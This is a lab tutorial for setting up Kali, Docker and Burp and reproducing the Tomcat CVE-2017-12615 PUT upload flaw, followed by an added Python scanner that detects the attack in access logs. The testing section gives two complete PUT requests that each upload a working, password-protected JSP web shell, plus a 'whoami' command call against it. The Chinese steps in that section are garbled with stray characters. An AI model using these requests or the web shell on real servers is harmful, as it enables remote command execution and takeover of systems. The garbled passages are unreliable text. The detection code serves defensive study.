Installing a Kali system and testing CVE-2017-12615
1 Install the Kali system
1.1 Download the VMware image archive
kali-linux-2022.1
The default username and password are both kali
1.2 Initialise the system
sudo apt update -y # run on the Kali host
sudo apt install -y sogoupinyin fcitx
sudo dpkg-reconfigure locales # tick [x] zh_CN.UTF-8 UTF-8
sudo reboot
1.3 Install Docker
vim /etc/apt/sources.list.d/docker.list
deb [arch=amd64] https://download.docker.com/linux/debian buster stable
sudo apt update -y
sudo apt install -y docker-ce
1.4 Install docker-compose
sudo apt install -y docker-compose
2 Configure the Burp proxy
2.1 Find Burp Suite under Applications
2.2 Under Proxy -> Options, add a proxy listener
2.3 In the browser's proxy settings, enter the listener address Burp opened
2.4 Import Burp's CA certificate into the browser
3 Set up the CVE-2017-12615 environment
sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash # run on the Kali host
root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start
# do not close this window for now
4 測(cè)試
先用瀏覽器訪問(wèn)
firefox http://127.0.0.1:8080
在brup中找到http proyx中找歷史信息,確認(rèn)代理是否生效
然后打開(kāi)brup的repeater編輯request
PUT /1.jsp::$DATA HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 659
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
-------------------------------------------------------------------------------------------------------
PUT /2.jsp/ HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 664
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
發(fā)送請(qǐng)求
http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023 #正常就返回系統(tǒng)用戶了
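From the defender's side, the two PUT requests above and the follow-up GET to the uploaded file leave a distinctive trail in the Tomcat access log. The scanner below is an added example, not code from the original post; it reads lines in Tomcat's default "common" AccessLogValve pattern (%h %l %u %t "%r" %s %b), and the log lines it contains are constructed to mirror the requests on this page. It flags any successful PUT, raises the severity when the target names a JSP, and correlates later requests against paths that were written (after normalising the /2.jsp/ and /1.jsp::$DATA forms to the file Tomcat actually creates).

```python
"""Detect the CVE-2017-12615 request pattern in Tomcat access logs.

Added example, not part of the original post. Log format assumed is the
Tomcat AccessLogValve "common" pattern; the sample lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
JSP_RE = re.compile(r"\.jspx?", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str
    reason: str
    target: str


def normalize(target: str) -> str:
    """Map a request target to the file path Tomcat would write or serve.

    Strips the query string, a trailing NTFS ``::$DATA`` stream suffix and a
    trailing slash, so the PUT and the later GET compare equal.
    """
    path = target.split("?", 1)[0]
    if path.endswith("::$DATA"):
        path = path[: -len("::$DATA")]
    if len(path) > 1 and path.endswith("/"):
        path = path[:-1]
    return path


def scan(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    uploaded: Dict[str, int] = {}  # normalised path -> line that wrote it
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        method, target, status = m["method"], m["target"], int(m["status"])
        ok = 200 <= status < 300
        path = normalize(target)
        if method == "PUT":
            if JSP_RE.search(path):
                findings.append(Finding(
                    n, "high" if ok else "medium",
                    "PUT of a JSP resource (CVE-2017-12615 pattern)", target))
                if ok:
                    uploaded[path] = n
            elif ok:
                findings.append(Finding(n, "low", "server accepted an HTTP PUT", target))
        elif path in uploaded and method in ("GET", "POST"):
            findings.append(Finding(
                n, "critical",
                f"request to JSP written by PUT at line {uploaded[path]}", target))
    return findings


# Constructed sample log mirroring the requests in the post.
SAMPLE_LOG = """\
192.168.144.1 - - [10/Mar/2022:14:02:11 +0800] "PUT /1.jsp::$DATA HTTP/1.1" 201 -
192.168.144.1 - - [10/Mar/2022:14:02:30 +0800] "PUT /2.jsp/ HTTP/1.1" 201 -
192.168.144.1 - - [10/Mar/2022:14:03:05 +0800] "GET /2.jsp?cmd=whoami&password=023 HTTP/1.1" 200 42
192.168.144.1 - - [10/Mar/2022:14:04:00 +0800] "GET /index.jsp HTTP/1.1" 200 11156
192.168.144.1 - - [10/Mar/2022:14:04:10 +0800] "PUT /upload/report.txt HTTP/1.1" 204 -
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: [{f.severity}] {f.reason}: {f.target}")
```

The correlation step is the useful part: a single PUT of a .jsp is suspicious, but a PUT followed by a request to the same normalised path is the upload being used, and that is what should page an analyst. Any PUT at all (the "low" finding) is worth reviewing, because a read-only DefaultServlet would have rejected it.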